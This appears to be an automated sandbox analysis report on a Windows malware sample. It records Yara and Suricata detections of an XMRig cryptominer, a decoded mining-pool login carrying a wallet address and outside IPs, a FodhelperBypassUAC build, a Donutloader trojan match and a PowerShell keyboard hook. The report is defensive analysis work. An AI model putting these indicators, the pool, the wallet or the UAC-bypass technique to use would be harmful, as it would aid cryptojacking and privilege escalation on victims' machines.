        Source: Yara match | File source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTR
        Source: global traffic | TCP traffic: 192.168.2.10:54464 -> 45.76.89.70:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 32 36 52 4e 78 53 53 45 71 63 50 75 76 34 68 77 45 48 6b 4a 66 37 6b 56 48 46 57 73 38 62 70 72 51 4a 70 4d 50 78 44 63 52 78 36 52 54 51 78 5a 57 37 72 42 79 69 58 55 34 43 6e 4d 44 71 72 48 4c 34 73 37 56 45 70 4d 47 38 51 6a 37 37 79 67 64 44 52 76 6b 42 55 33 4e 63 64 31 57 78 22 2c 22 70 61 73 73 22 3a 22 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 35 2e 32 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 31 39 22 2c 22 72 69 67 69 64 22 3a 22 22 2c 22 61 6c 67 6f 22 3a 5b 22 72 78 2f 30 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 63 6e 2f 31 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 61 73 74 72 6f 62 77 74 22 5d 7d 7d 0a data ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: stratum+tcp://
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: cryptonight/0
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: -o, --url=URL URL of mining server
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Usage: xmrig [OPTIONS]
        Source: e7WMhx18XN.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: e7WMhx18XN.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb | source: e7WMhx18XN.exe, 00000001.00000002.1346529843.000000001C470000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb | source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb | source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp, FodhelperBypassUAC.exe, 0000000C.00000000.1323844842.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp, FodhelperBypassUAC.exe, 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp
        Source: Binary string: /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 | source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: cwdC:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUACexeC:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.41.34120\bin\HostX64\x64\link.exepdbC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdbcmd /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 | source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: AC.pdb | source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_xfg_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\gs\amd64\amdsecgs.asmC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb | source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUAC\x64\Release\vc143.pdb | source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: FodhelperBypassUAC.pdb | source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp

        Networking

        Source: global traffic | TCP traffic: 147.185.221.22 ports 2,4,5,7,54872,8
        Source: global traffic | TCP traffic: 192.168.2.10:54593 -> 147.185.221.22:54872
        Source: Joe Sandbox View | IP Address: 45.76.89.70
        Source: Joe Sandbox View | IP Address: 147.185.221.22
        Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS
        Source: Joe Sandbox View | ASN Name: SALSGIVERUS
        Source: Network traffic | Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.10:58455 -> 1.1.1.1:53
        Source: Network traffic | Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.10:54464 -> 45.76.89.70:80
        Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.22 (15 connections)
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic | DNS traffic detected: DNS query: pool.hashvault.pro
        Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
        Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
        Source: powershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000038.00000002.1931071513.0000000002DC1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1992736988.0000000003357000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1997379038.0000000003807000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.microsoft
        Source: powershell.exe, 00000038.00000002.1931658908.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.microsoft6#ZQ
        Source: conhost.exe, 00000014.00000002.1399936831.00000113DCE61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2283061146.0000022F420B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2287502418.0000019C5BE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2281986100.000001DE99471000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: svchost.exe, 00000000.00000002.1367337795.0000010D91A13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.bingmapsportal.com
        Source: powershell.exe, 00000039.00000002.2283061146.0000022F420B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2287502418.0000019C5BE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2281986100.000001DE99471000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
        Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
        Source: svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365970028.0000010D91A59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
        Source: svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
        Source: svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
        Source: svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
        Source: svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365970028.0000010D91A59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
        Source: svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
        Source: svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
        Source: svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
        Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
        Source: svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&
        Source: svchost.exe, 00000000.00000003.1365253867.0000010D91A50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
        Source: svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
        Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
        Source: svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
        Source: svchost.exe, 00000000.00000003.1365253867.0000010D91A50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
        Source: svchost.exe, 00000000.00000003.1263372120.0000010D91A36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
        Source: svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
        Source: powershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
        Source: svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
        Source: svchost.exe, 00000000.00000003.1366170165.0000010D91A39000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
        Source: svchost.exe, 00000000.00000003.1366018989.0000010D91A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1263372120.0000010D91A36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367429694.0000010D91A39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366170165.0000010D91A39000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
        Source: svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
        Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
        Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://xmrig.com/benchmark/%s
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://xmrig.com/docs/algorithms
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

        System Summary

        Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
        Source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
